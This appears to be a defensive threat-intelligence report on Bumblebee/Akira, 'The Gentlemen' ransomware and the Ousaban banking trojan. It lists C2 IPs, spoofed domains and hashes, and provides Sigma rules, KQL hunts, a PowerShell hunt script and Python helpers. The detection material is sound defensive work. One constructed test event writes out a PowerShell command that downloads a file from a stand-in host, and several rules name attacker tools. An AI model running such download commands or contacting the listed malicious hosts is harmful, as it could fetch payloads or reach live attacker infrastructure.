Recent intelligence from AlienVault OTX highlights a convergence of high-risk activities spanning Ransomware-as-a-Service (RaaS), sophisticated loaders, and regional banking trojans. The data indicates three distinct but equally dangerous campaigns:
- Bumblebee to Akira Pipeline: A supply-chain style attack leveraging SEO poisoning to distribute trojanized IT management tools (specifically ManageEngine OpManager), leading to Bumblebee loader infections and ultimately Akira ransomware.
- The Gentlemen Emergence: A new top-tier RaaS actor "The Gentlemen" is aggressively exploiting internet-facing infrastructure (VPNs/Firewalls) to deploy SharkLoader and Cobalt Strike, utilizing extensive reconnaissance.
- Ousaban Regional Surge: A geofenced campaign targeting the Iberian Peninsula (Spain/Portugal) using the Ousaban banking trojan, delivered via phishing PDFs and steganographic payloads.
Threat Actor / Malware Profile
The Gentlemen
- Type: Ransomware-as-a-Service (RaaS)
- Distribution: Exploitation of vulnerabilities in internet-facing VPNs and Firewalls; potential collaboration with Initial Access Brokers (IABs).
- Payload Behavior: Utilizes SharkLoader for initial payload delivery, followed by Cobalt Strike (S0154) for command and control. Employs custom tools like SharpADWS and NetScan for reconnaissance.
- Persistence: GPO deployment and potentially vulnerable drivers to maintain access.
- Key TTPs: Network traffic capture via netsh, Active Directory enumeration.
Bumblebee & Akira
- Type: Loader / Ransomware
- Distribution: SEO Poisoning (BlackHat SEO) targeting IT administrators searching for tools like "ManageEngine OpManager" or "Angry IP Scanner".
- Payload Behavior: Trojanized installers execute Bumblebee (S1039), which facilitates lateral movement and credential dumping. AdaptixC2 is used for command and control before deploying Akira ransomware.
- Persistence: Bumblebee often establishes persistence via scheduled tasks or registry run keys.
Ousaban (Metamorfo)
- Type: Banking Trojan
- Distribution: Phishing emails containing PDF attachments with embedded links.
- Payload Behavior: VBS scripts download steganographic images containing malicious payloads. Performs geofencing checks to ensure the victim is in Spain or Portugal.
- Objective: Credential theft specifically targeting banking information.
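The profile above describes payloads hidden inside downloaded images. One defender-side check that does not depend on the specific loader is to verify that an image file ends where its format says it ends. The following Python is an added example, not code from the report or from any published Ousaban analysis; it assumes the payload is appended after the image's end marker (one common way such "steganographic" carriers are built; the report does not say how Ousaban embeds its payload). The image bytes are constructed inline, including a JPEG whose EXIF thumbnail carries its own end-of-image marker, the case a naive search for `FFD9` gets wrong.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_end(data):
    """Offset just past the IEND chunk, walking chunk headers; None if not a well-formed PNG."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4                      # header + payload + CRC
        if ctype == b"IEND":
            return pos if pos <= len(data) else None
    return None


def jpeg_end(data):
    """Offset just past the EOI marker. Segments are walked by length so an EXIF
    thumbnail's own FFD9 inside APP1 is not mistaken for the end of the image."""
    if not data.startswith(b"\xff\xd8"):
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xFF:                         # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:                         # EOI
            return pos + 2
        if marker == 0xD8 or 0xD0 <= marker <= 0xD7:   # standalone markers carry no length
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        pos += 2 + struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if marker == 0xDA:                         # SOS: skip entropy-coded data up to the next marker;
            while pos + 1 < len(data):             # FF00 is byte stuffing, FFD0-FFD7 are restart markers
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    return None


def bmp_end(data):
    """BMP declares its own file size at offset 2; anything beyond it is trailing data."""
    if len(data) < 6 or data[:2] != b"BM":
        return None
    declared = struct.unpack("<I", data[2:6])[0]
    return declared if declared <= len(data) else None


def trailing_bytes(data):
    """(format, bytes after the logical end of the image) or None if not a recognised image."""
    for fmt, finder in (("png", png_end), ("jpeg", jpeg_end), ("bmp", bmp_end)):
        end = finder(data)
        if end is not None:
            return fmt, len(data) - end
    return None


# Constructed samples: minimal valid images, each also with a blob appended after its end.
def png_chunk(ctype, payload):
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))

def jpeg_segment(marker, payload):
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

CLEAN_PNG = (PNG_SIG + png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
             + png_chunk(b"IDAT", zlib.compress(b"\x00\x00")) + png_chunk(b"IEND", b""))
STEGO_PNG = CLEAN_PNG + b"constructed-appended-payload" * 8          # 224 trailing bytes
CLEAN_JPEG = (b"\xff\xd8"
              + jpeg_segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
              + jpeg_segment(0xE1, b"Exif\x00\x00" + b"\xff\xd8\xff\xd9")    # thumbnail with its own EOI
              + jpeg_segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")
              + b"\x12\xff\x00\x34\xff\xd0\x56"                          # entropy data with FF00 stuffing and RST0
              + b"\xff\xd9")
STEGO_JPEG = CLEAN_JPEG + b"appended" * 10                               # 80 trailing bytes
CLEAN_BMP = b"BM" + struct.pack("<I", 70) + bytes(64)
STEGO_BMP = CLEAN_BMP + bytes(30)                                        # 30 trailing bytes

if __name__ == "__main__":
    for name, blob in [("clean.png", CLEAN_PNG), ("stego.png", STEGO_PNG), ("clean.jpg", CLEAN_JPEG),
                       ("stego.jpg", STEGO_JPEG), ("clean.bmp", CLEAN_BMP), ("stego.bmp", STEGO_BMP)]:
        print(name, trailing_bytes(blob))
```

A non-zero trailing count is a triage signal rather than proof of malice (some cameras and editors append metadata), so pair it with the process-creation telemetry around the download, for instance the wscript-to-PowerShell chain the detection section covers, and with the file hashes from the pulse.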
IOC Analysis
The provided pulses offer a mix of network and file-based indicators crucial for defense:
- Domains: Includes spoofed legitimate-looking domains (e.g., opmanager.pro, angryipscanner.org) used in SEO poisoning, and C2 infrastructure (e.g., rsat.activedirectory.ds-lds.tools).
- IP Addresses: C2 servers for the Ousaban campaign (162.33.179.46, 91.92.240.140, 78.40.209.32) and Bumblebee infrastructure (172.96.137.160).
- File Hashes: Multiple MD5, SHA1, and SHA256 hashes associated with the trojanized installers, loaders, and payload executables.
Operationalization:
SOC teams should immediately ingest these IOCs into EDR solutions (for file hash scanning) and Firewalls/Proxies (for IP and domain blocking). The specific file hashes provided (e.g., a14506c6... for Bumblebee installer) should be used to hunt for historical presence on endpoints.
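Operationalizing a pulse starts with splitting the indicators by type, because hashes go to the EDR while IPs and domains go to the perimeter, and a truncated hash like the one quoted above must never end up on a blocklist. The following Python is an added example, not tooling from the report or from AlienVault; it takes the indicators quoted in this report (plus defanged variants and the truncated hash, constructed here to exercise the edge cases), validates each one and produces the two lists. The function names and the one-indicator-per-line input format are assumptions.

```python
import re
from collections import defaultdict

# Constructed input: the values quoted in this report, with a few defanged forms and the
# report's truncated hash added to show what the parser has to cope with.
RAW_IOCS = """
opmanager.pro
angryipscanner[.]org
rsat.activedirectory.ds-lds.tools
172.96.137.160
162[.]33[.]179[.]46
91.92.240.140
78.40.209.32
a14506c6fb92a5af88a6a44d273edafe10d69ee3d85c8b2a7ac458a22edf68d2
d4eb4ff02df659fdeec17d36b77084627469623bb3c7d16383d257404b52d1c3
a746da514c90f26a187a294fda7edc1b
9321a61a25c7961d9f36852ecaa86f55
a14506c6...
"""

# Checked in this order so a hex string is never mistaken for a hostname.
PATTERNS = {
    "sha256": re.compile(r"^[0-9a-f]{64}$"),
    "sha1":   re.compile(r"^[0-9a-f]{40}$"),
    "md5":    re.compile(r"^[0-9a-f]{32}$"),
    "ipv4":   re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$"),
    "domain": re.compile(r"^(?=.{4,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$"),
}


def refang(token):
    """Undo common defanging: 'example[.]com' -> 'example.com', strip 'hxxp://' schemes."""
    token = token.strip().lower()
    for bracket in ("[.]", "(.)", "{.}"):
        token = token.replace(bracket, ".")
    return re.sub(r"^hxxps?://", "", token)


def classify(token):
    """Indicator type, or None for anything that is not a complete, well-formed IOC."""
    for kind, pattern in PATTERNS.items():
        if pattern.match(token):
            return kind
    return None


def normalize_iocs(raw):
    """Group indicators by type; returns (dict of type -> set, list of rejected tokens)."""
    grouped = defaultdict(set)
    rejected = []
    for line in raw.splitlines():
        token = refang(line)
        if not token or token.startswith("#"):
            continue
        kind = classify(token)
        if kind is None:
            rejected.append(token)      # e.g. the truncated 'a14506c6...' from the write-up
        else:
            grouped[kind].add(token)
    return dict(grouped), rejected


def blocklists(grouped):
    """Split into what the firewall/proxy blocks and what the EDR hunts for."""
    network = sorted(grouped.get("ipv4", set()) | grouped.get("domain", set()))
    hashes = sorted(grouped.get("sha256", set()) | grouped.get("sha1", set()) | grouped.get("md5", set()))
    return network, hashes


if __name__ == "__main__":
    grouped, rejected = normalize_iocs(RAW_IOCS)
    network, hashes = blocklists(grouped)
    print("perimeter blocklist:", network)
    print("EDR hash hunt list:", hashes)
    print("rejected (review by hand):", rejected)
```

Rejected tokens are reported rather than silently dropped, so an analyst sees that the truncated hash needs to be replaced with the full value from the pulse before the hunt runs.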
Detection Engineering
```yaml
title: Potential The Gentlemen Reconnaissance Activity
id: 9d0d4b3e-1a2b-4c3d-8e5f-6a7b8c9d0e1f
description: Detects reconnaissance tools and network capture techniques often used by The Gentlemen actors post-exploitation.
status: experimental
date: 2026/07/03
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/6658f3a78f4f462bf05d2bc7
tags:
  - attack.reconnaissance
  - attack.credential_access
  - gentlemen.raas
logsource:
  category: process_creation
  product: windows
detection:
  selection_netsh:
    Image|endswith: '\netsh.exe'
    CommandLine|contains: 'trace start'
  selection_tools:
    Image|endswith:
      - '\Advanced_IP_Scanner.exe'
      - '\netscan.exe'
      - '\SharpADWS.exe'
  condition: 1 of selection_*
falsepositives:
  - Legitimate network troubleshooting by IT admins
level: high
---
title: SEO Poisoning Trojanized Installer Execution
id: a1b2c3d4-e5f6-7890-1234-567890abcdef
description: Detects execution of renamed or suspicious IT tools often targeted in SEO poisoning campaigns leading to Bumblebee.
status: experimental
date: 2026/07/03
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/6658f3a78f4f462bf05d2bc6
tags:
  - attack.initial_access
  - attack.t1566.002
  - bumblebee
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\sihost.exe'
      - '\explorer.exe'
    Image|endswith:
      - '\msiexec.exe'
      - '\setup.exe'
      - '\OpManager.exe'
  condition: selection_parent
falsepositives:
  - Legitimate installation of ManageEngine or IP Scanners
level: medium
---
# DestinationHostname is a network_connection field, so the domain check is a separate rule
# rather than a second selection of the process_creation rule above; the two alert
# independently, which preserves the original "either selection" logic.
title: SEO Poisoning Domain Connection
id: 00000000-0000-4000-8000-000000000002  # placeholder, replace with a freshly generated UUID
description: Detects network connections to domains used in SEO poisoning campaigns leading to Bumblebee.
status: experimental
date: 2026/07/03
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/6658f3a78f4f462bf05d2bc6
tags:
  - attack.initial_access
  - attack.t1566.002
  - bumblebee
logsource:
  category: network_connection
  product: windows
detection:
  selection_network:
    DestinationHostname|contains:
      - 'opmanager.pro'
      - 'angryipscanner.org'
  condition: selection_network
falsepositives:
  - Legitimate installation of ManageEngine or IP Scanners
level: medium
---
title: Ousaban Steganography Payload Drop
id: f0e1d2c3-b4a5-6078-9012-34567890abcd
description: Detects VBS scripts spawning PowerShell to download images, a technique used by Ousaban to hide payloads.
status: experimental
date: 2026/07/03
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/6658f3a78f4f462bf05d2bc8
tags:
  - attack.defense_evasion
  - attack.t1027
  - ousaban
logsource:
  category: process_creation
  product: windows
detection:
  # One process_creation event carries both parent and child, so the VBS host is matched on
  # the parent fields and every selection must hold on that same event. A selection that
  # required Image to be wscript.exe could never match together with Image powershell.exe.
  selection_parent:
    ParentImage|endswith: '\wscript.exe'
    ParentCommandLine|contains: '.vbs'
  selection_download:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'DownloadFile'
      - 'Invoke-WebRequest'
  selection_image:
    CommandLine|contains:
      - '.jpg'
      - '.png'
      - '.bmp'
  condition: all of selection_*
falsepositives:
  - Unknown
level: high
```
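Whether a Sigma rule fires depends on how its selections and condition combine: fields inside a selection are ANDed, list values are ORed, and `1 of` versus `all of` decides how the selections combine. The following Python is an added example, not code from the report or from the Sigma project, and is a deliberately minimal evaluator for only the modifiers and condition forms the rules above use. The rule dictionaries mirror the netsh/tools rule and the Ousaban rule, with the Ousaban VBS host expressed on the parent fields of the same process-creation event as the PowerShell child (an assumption about how that rule is meant to match); the events are constructed and use `.invalid` hostnames.

```python
import re
from fnmatch import fnmatch

# Constructed rule definitions mirroring the detection blocks above. Each selection is an AND
# over its fields; a list value is an OR over patterns; the condition is one of the forms the
# rules use ('1 of selection_*', 'all of selection_*', or a bare selection name).
RULES = {
    "The Gentlemen reconnaissance": {
        "selections": {
            "selection_netsh": {"Image|endswith": r"\netsh.exe",
                                "CommandLine|contains": "trace start"},
            "selection_tools": {"Image|endswith": [r"\Advanced_IP_Scanner.exe",
                                                   r"\netscan.exe", r"\SharpADWS.exe"]},
        },
        "condition": "1 of selection_*",
    },
    "Ousaban steganography payload drop": {
        # Assumption: parent (wscript) and child (powershell) are fields of one event.
        "selections": {
            "selection_parent": {"ParentImage|endswith": r"\wscript.exe",
                                 "ParentCommandLine|contains": ".vbs"},
            "selection_download": {"Image|endswith": r"\powershell.exe",
                                   "CommandLine|contains": ["DownloadFile", "Invoke-WebRequest"]},
            "selection_image": {"CommandLine|contains": [".jpg", ".png", ".bmp"]},
        },
        "condition": "all of selection_*",
    },
}


def match_field(event, spec, patterns):
    """Apply one 'Field|modifier' test; Sigma string matching is case-insensitive."""
    field, _, modifier = spec.partition("|")
    value = str(event.get(field, "")).lower()
    for pattern in ([patterns] if isinstance(patterns, str) else patterns):
        p = pattern.lower()
        if modifier == "endswith" and value.endswith(p):
            return True
        if modifier == "startswith" and value.startswith(p):
            return True
        if modifier == "contains" and p in value:
            return True
        if modifier == "" and value == p:
            return True
    return False


def match_selection(event, selection):
    return all(match_field(event, spec, pats) for spec, pats in selection.items())


def evaluate(rule, event):
    """Evaluate a rule's condition against one event; True means the rule would alert."""
    hits = {name: match_selection(event, sel) for name, sel in rule["selections"].items()}
    quantified = re.match(r"^(1|all) of (\S+)$", rule["condition"])
    if quantified:
        quant, name_glob = quantified.groups()
        chosen = [hits[n] for n in hits if fnmatch(n, name_glob)]
        return any(chosen) if quant == "1" else bool(chosen) and all(chosen)
    return hits[rule["condition"]]


def triage(events):
    """Return (event id, rule name) pairs for every rule that fires on each event."""
    return [(e["id"], name) for e in events for name, rule in RULES.items() if evaluate(rule, e)]


# Constructed process-creation events, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\System32\cmd.exe", "ParentCommandLine": "cmd.exe",
     "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": r"netsh trace start capture=yes tracefile=C:\Temp\net.etl"},
    {"id": 2, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "ParentCommandLine": r"wscript.exe C:\Users\Public\invoice.vbs",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell (New-Object Net.WebClient).DownloadFile('http://example.invalid/img.png','C:\Users\Public\img.png')"},
    {"id": 3, "ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest http://example.invalid/report.png -OutFile report.png"},
    {"id": 4, "ParentImage": r"C:\Windows\System32\cmd.exe", "ParentCommandLine": "cmd.exe",
     "Image": r"C:\Windows\System32\netsh.exe", "CommandLine": "netsh interface ip show config"},
]

if __name__ == "__main__":
    for event_id, rule_name in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule_name}")
```

Event 3 is the instructive one: it satisfies the download and image selections but not the parent selection, so under `all of selection_*` it stays silent, which is exactly the gating that keeps an admin's ad-hoc `Invoke-WebRequest` from paging the SOC.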
```kql
// Hunt for network connections to known Bumblebee and Ousaban C2 infrastructure
// (the three queries below are independent; run each one on its own in Advanced Hunting)
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP in ("172.96.137.160", "162.33.179.46", "91.92.240.140", "78.40.209.32")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteIP, RemoteUrl
| extend AlertMessage = "Connection to known malicious IP detected"

// Hunt for SEO Poisoning domains
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "opmanager.pro" or RemoteUrl has "angryipscanner.org" or RemoteUrl has "ds-lds.tools"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl

// Hunt for file hashes associated with Bumblebee and Ousaban
DeviceFileEvents
| where Timestamp > ago(30d)
| where SHA256 in ("a14506c6fb92a5af88a6a44d273edafe10d69ee3d85c8b2a7ac458a22edf68d2", "d4eb4ff02df659fdeec17d36b77084627469623bb3c7d16383d257404b52d1c3") or MD5 in ("a746da514c90f26a187a294fda7edc1b", "9321a61a25c7961d9f36852ecaa86f55")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, MD5
```
```powershell
# IOC Hunt Script for Bumblebee and Ousaban Indicators
# Requires Administrative Privileges
# SHA256 and MD5 indicators are kept apart so each is compared against the matching algorithm
$MaliciousSha256 = @(
    "a14506c6fb92a5af88a6a44d273edafe10d69ee3d85c8b2a7ac458a22edf68d2", # Bumblebee Installer SHA256
    "d4eb4ff02df659fdeec17d36b77084627469623bb3c7d16383d257404b52d1c3"  # Ousaban Payload SHA256
)
$MaliciousMd5 = @(
    "a746da514c90f26a187a294fda7edc1b" # Bumblebee MD5
)
$MaliciousIPs = @(
    "172.96.137.160",
    "162.33.179.46",
    "91.92.240.140",
    "78.40.209.32"
)

Write-Host "[*] Scanning for file hashes..." -ForegroundColor Cyan
Get-ChildItem -Path C:\ -Recurse -File -ErrorAction SilentlyContinue | Where-Object {
    $_.Length -gt 0kb -and $_.Length -lt 50mb
} | ForEach-Object {
    # Get-FileHash returns upper-case hex; -contains compares case-insensitively
    $sha256 = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
    if ($sha256 -and $MaliciousSha256 -contains $sha256) {
        Write-Host "[!] MALICIOUS FILE FOUND (SHA256): $($_.FullName)" -ForegroundColor Red
        return   # acts as 'continue' inside ForEach-Object
    }
    $md5 = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
    if ($md5 -and $MaliciousMd5 -contains $md5) {
        Write-Host "[!] MALICIOUS FILE FOUND (MD5): $($_.FullName)" -ForegroundColor Red
    }
}

Write-Host "[*] Checking active network connections for malicious IPs..." -ForegroundColor Cyan
$connections = Get-NetTCPConnection -ErrorAction SilentlyContinue
foreach ($ip in $MaliciousIPs) {
    $hits = $connections | Where-Object { $_.RemoteAddress -eq $ip }
    foreach ($conn in $hits) {
        Write-Host "[!] ACTIVE CONNECTION TO MALICIOUS IP DETECTED: $ip (PID $($conn.OwningProcess))" -ForegroundColor Red
        # Resolve the owning process for triage; one connection maps to one PID
        Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue | Select-Object Id, ProcessName, Path
    }
}

Write-Host "[*] Scanning for spoofed domains in DNS cache..." -ForegroundColor Cyan
$domains = @("opmanager.pro", "angryipscanner.org", "ds-lds.tools")
$dnsCache = Get-DnsClientCache -ErrorAction SilentlyContinue
foreach ($domain in $domains) {
    # Entry is the cached name; report every record under the spoofed domain
    $cached = $dnsCache | Where-Object { $_.Entry -like "*$domain*" }
    foreach ($record in $cached) {
        Write-Host "[!] SPOOFED DOMAIN FOUND IN DNS CACHE: $($record.Entry) -> $($record.Data)" -ForegroundColor Red
    }
}
```
Response Priorities
- Immediate:
  - Block all identified IP addresses and domains at the perimeter (Firewall/Proxy).
  - Scan endpoints for the specific file hashes provided in the IOCs.
  - Isolate any devices exhibiting signs of Bumblebee (suspicious installer execution) or The Gentlemen (netsh trace capture).
- 24 Hours:
  - If credential dumping (Bumblebee) or banking trojans (Ousaban) are suspected, force a password reset for privileged accounts and users in the Iberian Peninsula or Finance departments.
  - Review VPN and Firewall logs for evidence of exploitation (The Gentlemen vector) and patch immediately if vulnerabilities are found.
- 1 Week:
  - Implement strict allow-listing for IT management tool downloads to mitigate SEO poisoning risks.
  - Conduct user awareness training focused on verifying official sources for software downloads.
  - Enhance email filtering for PDFs containing external links (Ousaban vector).